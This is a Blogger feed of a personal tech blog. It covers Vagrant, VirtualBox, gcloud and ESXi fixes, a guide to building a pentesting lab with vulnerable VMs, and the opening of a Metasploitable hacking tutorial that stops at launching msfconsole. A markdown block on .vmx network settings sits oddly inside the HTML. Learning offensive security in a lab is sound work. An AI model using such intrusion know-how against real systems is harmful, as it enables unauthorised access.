tag:blogger.com,1999:blog-41819395659769033822024-02-19T06:10:23.126-05:00HackavisionComputers, technology, and breaking things.
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comBlogger27125tag:blogger.com,1999:blog-4181939565976903382.post-11518506413921187312022-12-27T09:00:00.001-05:002022-12-27T09:00:00.171-05:00Vagrant "Fuse Device Not Found" Error Fix<p>You may come across this error while using Vagrant in WSL on Windows. It's very confusing, and the Google results are not particularly helpful for fixing this specific error:</p><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div style="text-align: left;"><div>fuse: device not found, try 'modprobe fuse' first</div><div><br /></div><div>Cannot mount AppImage, please check your FUSE setup.</div><div>You might still be able to extract the contents of this AppImage</div><div>if you run it with the --appimage-extract option.</div><div>See https://github.com/AppImage/AppImageKit/wiki/FUSE</div><div>for more information</div><div>open dir error: No such file or directory</div></div></blockquote><p>The cause of this, at least at the time of writing, is that newer versions of Vagrant (specifically 2.2.19) are broken in (some) cases, and the solution is to use an older Vagrant version (specifically, 2.2.6 works for me).</p><p>Download Links: https://releases.hashicorp.com/vagrant/2.2.6/</p><p>Windows MSI: https://releases.hashicorp.com/vagrant/2.2.6/vagrant_2.2.6_x86_64.msi</p><p>Reference (my project): https://github.com/Marshall-Hallenbeck/red_team_attack_lab/blob/main/docs/windows_setup.md#fuse-device-not-found</p>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-25812194401093762852022-12-26T09:00:00.000-05:002022-12-26T09:00:00.181-05:00Virtualbox VBoxManage startvm Error Fix<p>If you ever come across an error like this:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div style="text-align: left;"><div>There was an error while executing `VBoxManage`, a CLI used by Vagrant</div></div><div style="text-align: left;"><div>for controlling VirtualBox. The command and stderr is shown below.</div></div><div style="text-align: left;"><div><br /></div></div><div style="text-align: left;"><div>Command: ["startvm", "f71acfb8-5456-4fa3-85f8-e1a7d744f416", "--type", "gui"]</div></div><div style="text-align: left;"><div><br /></div></div><div style="text-align: left;"><div>Stderr: VBoxManage.exe: error: Failed to get device handle and/or partition ID for 0000000001688b80 (hPartitionDevice=0000000000000c29, Last=0xc0000002/1) (VERR_NEM_VM_CREATE_FAILED)</div></div><div style="text-align: left;"><div>VBoxManage.exe: error: Details: code E_FAIL (0x80004005), component ConsoleWrap, interface IConsole</div></div></blockquote><p>The cause is that Windows has weird virtualization (no surprise) and requires you to disable Hyper-V.</p><p>Run these commands from an elevated (Administrator) command prompt to do so (this will reboot!):</p><blockquote>bcdedit /set hypervisorlaunchtype off<br />DISM /Online /Disable-Feature:Microsoft-Hyper-V<br />shutdown /r /t 0</blockquote>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-38099092016249548542022-12-20T21:50:00.004-05:002022-12-20T21:50:37.414-05:00Google Cloud Authentication "activate-service-account" Problem Refreshing Auth Token<p>I just ran into this issue: adding a Google Cloud auth key via the command line threw an error about the JWT token being invalid, even though it had just been created.<br />The command I was running was:</p><blockquote><p>gcloud auth activate-service-account --key-file auth.json</p></blockquote><p>The error I was receiving was:</p><blockquote><p>ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: ('invalid_grant: Invalid JWT: Token must be a short-lived token (60 minutes) and in a reasonable timeframe. Check your iat and exp values in the JWT claim.', {'error': 'invalid_grant', 'error_description': 'Invalid JWT: Token must be a short-lived token (60 minutes) and in a reasonable timeframe. Check your iat and exp values in the JWT claim.'})</p></blockquote><p>This doesn't really tell you much, other than that there's something wrong with the token.</p><p>HOWEVER, there isn't actually anything wrong with the token! <b>The issue was that the Linux VM I was on had its time messed up, causing it to be about 8 hours in the future!</b><br />Simply fixing my VM's clock made it work.</p><p>I didn't look into the details of how activate-service-account works, but I assume it requests a JWT, and the token it requests then makes it freak out since the clock is skewed.</p><p>Anyway, I hope this helps someone when Googling this error.</p>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-43560550398911863922022-12-16T16:12:00.005-05:002022-12-16T16:14:05.574-05:00Enable Copy Paste Globally in ESXi<p>If you are like me and constantly copy and paste things between your host machine and VMs, but don't want to bother enabling copy and paste for each VM in your ESXi configuration, here's how you do it.</p><p>First, enable SSH access, connect to your ESXi host, and edit the "/etc/vmware/config" file:</p><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><p style="text-align: left;"><span style="font-family: courier;">vi /etc/vmware/config</span></p></blockquote><p>Now add in the following lines:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><span style="font-family: courier;">vmx.fullpath = "/bin/vmx"<br /></span><span style="font-family: courier;">isolation.tools.copy.disable="FALSE"<br /></span><span style="font-family: courier;">isolation.tools.paste.disable="FALSE"<br /></span><span style="font-family: courier;">isolation.tools.setGUIOptions.enable="TRUE"</span></blockquote><p>To take effect right away, reboot the ESXi host.</p>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-50179164743259971882013-05-15T22:22:00.001-04:002022-12-20T10:46:11.207-05:00How to Unfollow Blogs or "Reading List" on Google [Non-Technical]<div dir="ltr" style="text-align: left;" trbidi="on">
This is a very non-technical post, but I could not find ANY information about unfollowing blogs through Blogger without directly going to the blog and clicking a bunch (which from my point of view is INCREDIBLY annoying to say the least) so I thought it might help a few people out.<br />
<br />
I had this problem that I somehow had a ton of random blogs followed but didn't feel like going to 100+ blogs and unfollowing them individually. After a lot of searching I finally came across a very random post that would not intuitively come up via a search engine.<br />
<br />
<a name='more'></a>Blogger's help suggests going to the main page and selecting the settings wheel seen here:</div><div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw734rukFskM1O6c5ycgWGU7-8FauySbjyUKe4n7IIFhOHpKiRSdeRk4U9GQ363McP6LvxyGLDUn1ZXUDWvBZH3J88Hl_124x1H7fIqk7tr70iWt2UMVmNb8lgEKHVigk0nTrDZd2CZxE/s1600/Reading_List_Settings.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw734rukFskM1O6c5ycgWGU7-8FauySbjyUKe4n7IIFhOHpKiRSdeRk4U9GQ363McP6LvxyGLDUn1ZXUDWvBZH3J88Hl_124x1H7fIqk7tr70iWt2UMVmNb8lgEKHVigk0nTrDZd2CZxE/s320/Reading_List_Settings.PNG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>
The problem with this is there's a broken link (at least for me on all my browsers)...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg79wd60Y0OS13POOKTZv_hO5upgAMIkRxGD0qb0g_7OHSt1ZMqfvdwfIDm1OL-KVb0d3y9kkCb-Y79nQGdbdMEw569WFcVuFuCzkQSTjDKAUCoS5JUru3iWAEb8-EwM8MFgsL7y3X0XHE/s1600/Google_Terrible_Service.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg79wd60Y0OS13POOKTZv_hO5upgAMIkRxGD0qb0g_7OHSt1ZMqfvdwfIDm1OL-KVb0d3y9kkCb-Y79nQGdbdMEw569WFcVuFuCzkQSTjDKAUCoS5JUru3iWAEb8-EwM8MFgsL7y3X0XHE/w512-h103/Google_Terrible_Service.PNG" width="512" /></a></div><div dir="ltr" style="text-align: left;" trbidi="on"><br /></div>
Well, I finally found a fix for this stupidity and it's really simple. Go to <a href="http://www.google.com/reader/settings">http://www.google.com/reader/settings</a> and then the "Subscriptions" tab, then select the blogs and hit "Unsubscribe".<br />
<br />
Bam, done. Took way too long for me to find that, which I don't think is my fault (who looks under reader settings when it's through Blogger?).<br />
<br />
Also, please fix the "Reading list" error -- it's been like this for months.</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-36856734807993449672013-04-16T19:59:00.001-04:002023-01-06T10:38:04.278-05:00[2013 Version] Starting a Pentesting Lab [How-To/Linux/Windows]<div dir="ltr" style="text-align: left;" trbidi="on">
Recently I bought a gaming computer with some of the best specs out there (i7, gtx670, 16gig ram, ssd, etc) and decided to finally set up my own Pentesting lab so I can practice breaking and securing "real" boxes of my own.<br />
<br />
My current setup consists of my router connected to my apartment's WAN using DHCP, which issues private DHCP leases to the connected boxes on my network. I have a Windows 7 laptop of my own, a Windows 7 desktop host machine running VMs, and an Ubuntu 12.10 server for all my main Linux needs (I have SSH set up so I can access this box from work and other places).<br />
My friends also connect to this network via Wi-Fi, so there are random Win7 and OS X computers connected to it.<br />
As for my virtualized boxes, I have Windows XP (different SPs), Windows Server 2003, 2008, and 2012, Metasploitable 2, DVL (Damn Vulnerable Linux), BackTrack5R3 (I hack from this box), and a few other exploitable machines. I will be setting up a Windows Vista and a couple other *nix distros to exploit, as well.<br />
<br />
<a name='more'></a><br />
I am using <a href="http://www.vmware.com/products/workstation/" target="_blank">VMware Workstation</a>, which is provided to me for free through my University and our <a href="https://www.dreamspark.com/" target="_blank">MSDNAA</a> agreement. For those who do not have access to such great tools, you can use the free version, <a href="http://www.vmware.com/products/player/" target="_blank">VMware Player</a>, but be forewarned that certain options may be different. I apologize if there are any problems when following my guides using Player instead of Workstation, but I will do my best to remedy these.<br />
<h3 style="text-align: center;">
Getting Started</h3>
<div>
If you already have a VM loader, or specifically a VMware application, installed, ignore the following instructions, as they are for people who do not have a VM loader.</div>
<div>
<br /></div>
<div>
From the links below, download the flavor of VMware you can use (if you are a student who has MSDNAA access, I highly suggest getting Workstation). If you do not like VMware, there are also alternatives, but I suggest using VMware, as all my instructions will be using that.</div>
<div>
<br /></div>
<div>
<b>VM Applications:</b></div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.vmware.com/products/workstation/" target="_blank">VMWare Workstation</a> - Requires Activation Key after 30 days</li>
<li><a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a> - Free</li>
<li><a href="https://www.virtualbox.org/wiki/Downloads" target="_blank">VirtualBox</a> - Free (Download links for Windows, OS X, and Linux)</li>
<li><a href="http://www.parallels.com/" target="_blank">Parallels</a> - Costs Money; For OS X</li>
<li><a href="http://wiki.qemu.org/Main_Page" target="_blank">QEMU</a> - Free; For Linux</li>
<li><a href="http://www.microsoft.com/windows/virtual-pc/" target="_blank">Virtual PC</a> - Free; For running XP (honestly just use one of the above, but to each their own)</li>
</ul>
<div>
Once you have installed the VM application, we can start by collecting vulnerable VMs and the like.</div>
</div>
<div>
<br /></div>
<h3 style="text-align: center;">
Collecting Vulnerable VMs</h3>
<div>
This may require a decent amount of hard disk space, so I would suggest making sure you have enough to download and keep the drives on your disk. I have a few separate, cheap 7200rpm WD drives from 250-500gigs specifically for downloading and running VMs off of.</div>
<div>
<br /></div>
<div>
<b>Below is a list of exploitable and vulnerable VMs/ISOs(updated 10/29/12):</b><br />
<br />
<a href="http://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> - Probably the best VM to use. Complete vulnerable VM with services set up for everything. Most of my tutorials will start with exploiting this.<br />
<u>Damn Vulnerable Linux 1.5</u> - Discontinued, but I have the ISO. I will upload it *somewhere* when I'm home, either directly through this site or on a sharing site (you could torrent, but I want all of the downloads to be available as direct downloads).<br />
<a href="http://sourceforge.net/projects/lampsecurity/" target="_blank">LAMP Security Training</a> - LAMP stands for Linux Apache MySQL PHP, and this version is for the security testing of those.<br />
<a href="http://sourceforge.net/projects/owaspbwa/files/" target="_blank">Open Web Application Security Project (OWASP) Broken Web Applications Project</a> - Self Explanatory; OWASP's Broken Web App Project!<br />
<br />
<b>Below is a list of VMs and ISOs that you can configure yourself:</b><br />
<br />
<a href="http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/" target="_blank">UltimateLAMP</a> - Scroll down for the download link; a complete LAMP (Linux, Apache, MySQL, PHP) distro.<br />
<br />
<b>Below is a list of VMs and ISOs to hack <i>from:</i></b><br />
<b><i><br /></i></b>
<strike><a href="http://www.backtrack-linux.org/downloads/" target="_blank">BackTrack5R3</a> - I use the Gnome 32bit VM one and just load it into my VMWare; all of my tutorials will be from Ubuntu 12.04 LTS, or BT5R3 (which is Ubuntu, as well).</strike> <b>BackTrack has been replaced by the following: <a href="http://www.kali.org/downloads/" target="_blank">Kali Linux</a></b><br />
<a href="http://www.backbox.org/downloads" target="_blank">BackBox</a> - Another Ubuntu based Pentesting distro<br />
<a href="http://www.blackbuntu.com/download" target="_blank">BlackBuntu</a> - Yet another Ubuntu based Pentesting distro<br />
<br />
<h3 style="text-align: center;">
Creating Your Pentesting Network</h3>
</div>
<div>
Now that we have a host machine with a virtual machine application (I suggest VMWare), it's time to set up your network so you can see all your exploitable (and maybe non exploitable) VMs!<br />
<br />
For the machines that are already built for VM usage (aka they're VMDK and not ISO), just double click the .VMX file which is the configuration file for the virtual machine, and it will automatically open with the configured VM software.<br />
<br />
For the machines that you downloaded in ISO format, we have to add them into our VM software. Below I will show you how to do so in VMWare Workstation (though I believe the free version of VMWare is the same).<br />
<h4 style="text-align: center;">
Creating a Virtual Machine from an ISO</h4>
</div>
<div>
Now we'll be loading Ubuntu Server 12.04.1 LTS (Long Term Support), since it is a good operating system to mess around with and learn Linux on. Most if not all other ISO installations will be just as easy as this one.<br />
<br />
To start, open VMware Workstation. Mine looks like the following, but yours will have no VMs added/opened.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a data-darkreader-inline-bgcolor="" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrXjLq_GaFZQRDGu3Rn0yfHIN9BT0GBRdeqWrMTNVvyXY70GqlVr7J4TeGqAiKEO3S6GWI5xapmFpKVubdCNmbWVtW5Zb2IjpLqd6zix1z462PoUzsy7CeaE0Nc-EdUXubVSxbR1dun8/s1600/1+-+VMware+Workstation+Screenshot.PNG" imageanchor="1" style="background-color: black; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrXjLq_GaFZQRDGu3Rn0yfHIN9BT0GBRdeqWrMTNVvyXY70GqlVr7J4TeGqAiKEO3S6GWI5xapmFpKVubdCNmbWVtW5Zb2IjpLqd6zix1z462PoUzsy7CeaE0Nc-EdUXubVSxbR1dun8/s400/1+-+VMware+Workstation+Screenshot.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">When I load up my VMware Workstation; basic view</td></tr>
</tbody></table>
To add a new virtual machine, from the upper left "File" drop down, select "New Virtual Machine".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpQ3i1t2MwAVNQKQ9l6cyQrWkwYFwKtbOXCMELaiT0xEv_qcj9lg1V7zb3al2zw2UcDZWsGwLYPzjLLVsFduj6qA3X7ew-l70JvIdjDf-BQlSt6nkRNRANl1OXKhWkGNZmwv2ApKEAqeM/s1600/2+-+New+Virtual+Machine.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpQ3i1t2MwAVNQKQ9l6cyQrWkwYFwKtbOXCMELaiT0xEv_qcj9lg1V7zb3al2zw2UcDZWsGwLYPzjLLVsFduj6qA3X7ew-l70JvIdjDf-BQlSt6nkRNRANl1OXKhWkGNZmwv2ApKEAqeM/s400/2+-+New+Virtual+Machine.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
We are going to select "Typical" which is the recommended setting. For most if not all VMs you will be using in your lab you can just select the typical settings. Hit next to continue to the next part which we will be...<br />
<br />
Selecting the installer disk image, or the ISO file that you have previously downloaded at the above or an alternative link.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNmxVaR4vaXYZ7_RzXajWxCvZgoB1tLNFzfyKeWDphQdFDWoT2lkrkRGMfirfVX1Vn_aKDRDYhHS3_EqGGzz4BtZa2V5bcP7faTS7JTSMt_fDoFBRQFiJYGerDW6vBMS4cE0IjY5UOHqE/s1600/3+-+Guest+OS+Install+1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNmxVaR4vaXYZ7_RzXajWxCvZgoB1tLNFzfyKeWDphQdFDWoT2lkrkRGMfirfVX1Vn_aKDRDYhHS3_EqGGzz4BtZa2V5bcP7faTS7JTSMt_fDoFBRQFiJYGerDW6vBMS4cE0IjY5UOHqE/s400/3+-+Guest+OS+Install+1.PNG" width="400" /></a></div>
<br />
Click on browse and locate the ISO you wish to install. We are using our Ubuntu 12.04.1, but we have many others to choose from as you can see.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBhJofLs9JTLKzqccQN9VvSuAJzSYeWKeGrG2z79Z__dBvdlsQ6Yb2Dfp9wi7NP31UqJ6eRdS564gWUyQ6lTvsqBBe91YlhkqjPSqhj0wLoc62dQdRezXGwYc6hBIfWoB7LepJu4xFPNQ/s1600/4+-+Selecting+OS+ISO.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBhJofLs9JTLKzqccQN9VvSuAJzSYeWKeGrG2z79Z__dBvdlsQ6Yb2Dfp9wi7NP31UqJ6eRdS564gWUyQ6lTvsqBBe91YlhkqjPSqhj0wLoc62dQdRezXGwYc6hBIfWoB7LepJu4xFPNQ/s400/4+-+Selecting+OS+ISO.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Once you select the correct ISO and hit next, it will prompt for some "Easy Install Information" since it recognizes that we are installing Ubuntu 64-bit.<br />
For these settings, just enter what you want, but keep in mind the username cannot have capitals, and a password is required (I usually just do my first name with "test" or something lame).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj197vM19gOGUV32UUnBmBRzlIjAGwY6WbF29QGSKbs_gwqlxGOkgiPp8xKguKt2LVFvvP043d0_nP-Q3yuaVfcJ1vQDQGdrIC6NHjVlMOyCZPh3heRoAe3L4dJPS-MfY-e2p3yhglCsSk/s1600/5+-+Easy+Install+Ubuntu+Personalize.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj197vM19gOGUV32UUnBmBRzlIjAGwY6WbF29QGSKbs_gwqlxGOkgiPp8xKguKt2LVFvvP043d0_nP-Q3yuaVfcJ1vQDQGdrIC6NHjVlMOyCZPh3heRoAe3L4dJPS-MfY-e2p3yhglCsSk/s400/5+-+Easy+Install+Ubuntu+Personalize.PNG" width="400" /></a></div>
<br />
After you have done this, hit next as normal.<br />
This part is where you will be selecting what you wish to name your VM, and where you want to store your disk files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqQCd3qvLxZZTyixzdePvffizhosiNk2VuJFsoX2AJTf02k-5v69w9y6ofExqFq58Vk_9K9r1j1sfnpoABWHj2pmNHfOM8Fv1oPSyuLEl96XKn1znjZXDz1Ik-qNh7kop4YBd_88NVI8I/s1600/6+-+Name+Virtual+Machine.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqQCd3qvLxZZTyixzdePvffizhosiNk2VuJFsoX2AJTf02k-5v69w9y6ofExqFq58Vk_9K9r1j1sfnpoABWHj2pmNHfOM8Fv1oPSyuLEl96XKn1znjZXDz1Ik-qNh7kop4YBd_88NVI8I/s400/6+-+Name+Virtual+Machine.PNG" width="400" /></a></div>
<br />
This part is important because you cannot have two of the same name (duh), and because if you store all your VMs together, as they become larger there needs to be sufficient disk space on the drive you are saving them to.<br />
Name each of your Virtual Machines so you can tell them apart. Some of mine have specific names (like Metasploitable2) and some have just the distro name if it's generic (like Ubuntu 12.04 LTS).<br />
<br />
The next step is the size of the virtual disk you will be creating for this VM. It is very important to make it large enough so that if you use it often (installing applications/writing programs/etc) it will not fill up, but not too large that you're wasting space. <b>Note that the files become larger as you use the space, so you can overshoot a bit for this.</b><br />
<br />
For our Ubuntu I'm just going to put it to 8gigs since I'll probably be deleting it (I already have a few Ubuntus spun up).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheC0oIWZkfMrtF_1OsvRRaLo4E8khLb0ZATGdIlSSd0q3NRoOmaSMDZjRdEEe5uzyXxTwPWyRdkru3OyW1LFBTGuRVFwoWuDNY3Kfn1yvhS6XurcoaLeTbT2Eli4hslkMJbEks-C6i1W4/s435/10+-+Size+of+VM.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheC0oIWZkfMrtF_1OsvRRaLo4E8khLb0ZATGdIlSSd0q3NRoOmaSMDZjRdEEe5uzyXxTwPWyRdkru3OyW1LFBTGuRVFwoWuDNY3Kfn1yvhS6XurcoaLeTbT2Eli4hslkMJbEks-C6i1W4/s400/10+-+Size+of+VM.PNG" width="400" /></a></div>
<br />
After clicking next, this screen shows the brief overview of what we have selected. There is also a "customize hardware" button which we will be utilizing so we do not have to change it after the creation.<br />
<b>Note: We will be changing the virtual adapter (NIC - Network Interface Card) from NAT to Bridged, so if you want NAT, ignore this section.</b><br />
<b>A bridged connection means that the VM will connect directly to your network like another computer through your NIC (aka it will have its own IP through DHCP/etc). </b><br />
<b>The default is NAT which means that the computer is essentially the router to your VM.</b><br />
<b>It all depends on what you want, but I like bridged.</b><br />
<br />
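Since the .vmx file mentioned earlier is the VM's configuration, the same NAT-vs-bridged choice can be read and set there directly. The fragment below is an added, constructed illustration (not from the original post or from VMware's documentation) of the adapter keys with the three common values, including host-only, which the wizard also offers but the post does not discuss.

```ini
# Added example: network adapter section of a VMware .vmx file (constructed
# illustration, not from the original post). Only the adapter-related keys
# are shown; a real .vmx contains many more.
ethernet0.present = "TRUE"
ethernet0.virtualDev = "e1000"

# Option 1: NAT (the wizard default). The host routes traffic for the VM; the
# VM can reach the LAN, but nothing on the LAN can reach the VM unless you
# add port forwarding.
ethernet0.connectionType = "nat"

# Option 2: bridged (what the post switches to). The VM gets its own DHCP
# lease on the physical LAN and is reachable by every other device on it,
# including the friends' laptops on the Wi-Fi described earlier. Deliberately
# vulnerable guests such as Metasploitable 2 should not be bridged onto a
# shared network.
# ethernet0.connectionType = "bridged"

# Option 3: host-only. The VM sits on a private virtual switch shared only
# with the host and other host-only VMs, so the attacking VM and the
# vulnerable VMs still see each other while nothing else on the LAN can.
# This is the safer default for a pentesting lab.
# ethernet0.connectionType = "hostonly"
```

Only one `ethernet0.connectionType` line should be active at a time; edit the file while the VM is powered off, since Workstation rewrites it on shutdown.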
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeYwW-9SGCGfflS83iGDKcYKTuLSTMwBD-XMibOZdMvyEII6Jad26dSYPRqRfK_0tfKaXD9HU1Na0swnkJ8XA3X4JB2gmGrk2VeYZtchRxFS9CQO5E-kcDuh0cGZfOtBr3s_Nb4epCho/s432/11+-+Review+Screen.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeYwW-9SGCGfflS83iGDKcYKTuLSTMwBD-XMibOZdMvyEII6Jad26dSYPRqRfK_0tfKaXD9HU1Na0swnkJ8XA3X4JB2gmGrk2VeYZtchRxFS9CQO5E-kcDuh0cGZfOtBr3s_Nb4epCho/s400/11+-+Review+Screen.PNG" width="400" /></a></div>
<br />
Go ahead and click the <i>Customize Hardware...</i> button so we can change a few options.<br />
You will be presented with the following screen:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiMQRDL6RBzrV-NIs1kOJJK2F7WCnMiHAzv8MrK_M-e16_SHGlwj5L7CNJP9Jp-2974dni8PluZHmSsutrarw4a3a0m_GyvxDegE4W5Cc02OS7UL6GRSF0DO51_4GPND4gyiagTJGsRJg/s660/12+-+Customize+Hardware+Main+Screen.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiMQRDL6RBzrV-NIs1kOJJK2F7WCnMiHAzv8MrK_M-e16_SHGlwj5L7CNJP9Jp-2974dni8PluZHmSsutrarw4a3a0m_GyvxDegE4W5Cc02OS7UL6GRSF0DO51_4GPND4gyiagTJGsRJg/s400/12+-+Customize+Hardware+Main+Screen.PNG" width="400" /></a></div>
<br />
The memory is of course the RAM for our virtual machine. I will be leaving this at 1gig, but you can jack it up depending on what you want.<br />
<b>Note that for VMs, it is up to you to choose how much RAM to give it. Certain pre-built VMs like Metasploitable only require a small amount, but others like Windows require more.</b><br />
<b><br /></b>
Like I said before, we are only changing the Network Adapter settings from NAT to bridged. Click on the "<i>Network Adapter</i>" selection under the <i>Devices </i>or click "<i>Add...</i>" if one is not there.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGXBWH-aOAjnDFzUQE05Kx6JpcKPUwweAHlfU_5YpMoD13ato-uc1mgrZNIYhfKsCpwj3m6OoD9Q77QslxBU0-PgBOCfTYEwrPCOE92eU4VPjFxnICMyqHRgiv-T3p6uokMUl7xJKGvgQ/s651/13+-+Bridged+Network+Adapter.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGXBWH-aOAjnDFzUQE05Kx6JpcKPUwweAHlfU_5YpMoD13ato-uc1mgrZNIYhfKsCpwj3m6OoD9Q77QslxBU0-PgBOCfTYEwrPCOE92eU4VPjFxnICMyqHRgiv-T3p6uokMUl7xJKGvgQ/s400/13+-+Bridged+Network+Adapter.PNG" width="400" /></a></div>
<br />
After this is finished, just click "<i>Close</i>" and "<i>Finished</i>" on the following screen, and your VM should start to boot.<br />
Ubuntu will go through some checks, copy some files, and install on the virtual disk.<br />
Finally it will present you with the login screen (I hope you remembered your credentials).<br />
<br />
This method can be used on almost any .iso to install it (any that I've seen); however, like I said before, some hacking/vulnerable distros come in a pre-packaged VM, like Kali or previously BackTrack.</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-78562081879037323862012-11-04T22:47:00.002-05:002022-12-20T10:46:15.917-05:00Hacking Metasploitable #1: Introduction & IRC Hack [Metasploit/Linux/Exploit/How-to]<div dir="ltr" style="text-align: left;" trbidi="on">
Starting today, I will be releasing how-tos on hacking the Metasploitable distro of Linux released by the creators of Metasploit, in which I will go through how to determine if a system is exploitable, how to use Metasploit, how to load modules and run exploits, and what to do once you have exploited a system.<br />
<div>
<br /></div>
<div>
I hope these posts, starting with this (#1), teach the readers the important parts of using Metasploit as well as the basics of Pentesting and exploitation. This is by no means a thorough series on exploitation, but a way to get basic users' hands wet in the world of exploitation and hacking.</div>
<div>
<a name='more'></a>Before we begin, I assume you have Metasploitable installed on a VM or host box (I suggest a VM), Metasploit installed on a system (BT5R3 has it automatically installed, which I will be using for this), and a basic understanding of how to use a computer. If you do not have these, please see the linked how-tos or research these topics further. Let's begin.</div>
<div>
<br /></div>
<div>
To first understand the basics of this exploit, read the Vulnerability Summary for CVE-2010-2075 (CVE stands for Common Vulnerabilities and Exposures), which can be found <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2075" target="_blank">here</a>. Summaries of exploits are commonly released and reviewed by the US government and other large security companies, and can be <a href="http://web.nvd.nist.gov/view/vuln/search?execution=e2s1" target="_blank">searched</a> for through <a href="http://www.exploit-db.com/" target="_blank">many sites</a> which <a href="http://osvdb.org/search/advsearch" target="_blank">are useful</a> for understanding exploits and staying relevant in the security industry.</div>
<div>
<br /></div>
<div>
If you have read the exploit summary, you should have <i>some</i> understanding of how this exploit came to be and why it is dangerous. Backdoors like this are sometimes secretly hidden in software and take a while to come out, leading to scary exploits like this that allow root access quite easily. Now that we've discussed the exploit briefly, let's go over how we find a vulnerable machine and exploit it.</div>
<div>
<br /></div>
<div>
To open Metasploit, run the command:</div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msfconsole</span></blockquote>
<span style="font-family: inherit;">It may take a while to open, or spit a warning back at you saying that you need to chmod or run as root. If you're not running BT5R3 as the default root, then you need to run msfconsole with sudo and enter your sudo password to load it up.</span> If you receive this warning, ctrl-c out of it and run<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">sudo msfconsole</span></blockquote>
